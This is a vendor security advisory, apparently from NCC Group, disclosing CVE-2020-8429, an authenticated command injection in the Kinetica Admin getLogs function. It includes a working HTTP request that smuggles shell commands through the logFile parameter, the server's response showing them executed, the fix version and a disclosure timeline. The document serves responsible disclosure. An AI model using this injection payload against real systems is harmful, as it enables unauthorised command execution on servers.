Technical Advisory: Command Injection
Vendor: Kinetica
Vendor URL: https://www.kinetica.com/
Versions affected: 7.0.9.2.20191118151947
Systems Affected: All
Author: Gary Swales Gary.Swales@nccgroup.com
Advisory URL / CVE Identifier: CVE-2020-8429
Risk: High (Command Injection on the underlying operating system)
Summary
The Kinetica Admin web application version 7.0.9.2.20191118151947 did not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited to allow an authenticated attacker to run remote code on the underlying operating system. The web application allows for administrators to view statistics and manage different users of the application.
Location
The logFile parameter in the getLogs function was used as a variable in a command, which was used to read log files, however due to poor input sanitisation it was possible to bypass the single quote replacement and break out of the command. As the search and replace was replacing one quote with three quotes it was trivial to provide a working payload which can be seen in the details section.
Impact
The vulnerability allows an authenticated user to run commands on the underlying operating system.
Details
An authenticated user could submit the following request and run commands on the underlying server:
Request:
GET
/gadmin/resources/gpudbManager/getLogs?logFile=gpudb.log';echo%20ncctest;date;' la
stNumberOfLines=1 HTTP/1.1
Host: <REDACTED>:<REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101
Firefox/72.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 1 Jan 1970 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Referer: https://<REDACTED>:<REDACTED>/gadmin/
Cookie: JSESSIONID=4E92E2<REDACTED>F61FB308
Response
HTTP/1.1 200
Date: Thu, 16 Jan 2020 17:20:49 GMT
Server: <REDACTED>
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Type: application/json
Connection: close
Content-Length: 151
{"results":"ncctestnncctestnThu Jan 16 12:20:49 EST
2020n","success":false,"error":"ncctestnncctestnThu Jan 16 12:20:49 EST
2020n","exitValue":0}
Recommendation
Ensure that the software is updated to the latest version, at the time of writing 7.0.11.5 as the vendor states this issue has been fixed.
Vendor Communication
22/01/2020 – Vendor Notified
23/01/2020 – Vendor Notifies version 7.0.11.5 is to be released on the 24/01/2020 which fixes the issue.
30/01/2020 – Vendor Notified advisory to be published in February.
03/02/2020 – Vendor updates release notes: https://support.kinetica.com/hc/en-us/articles/360042820673-Kinetica-7-0-11-5-Release-Notes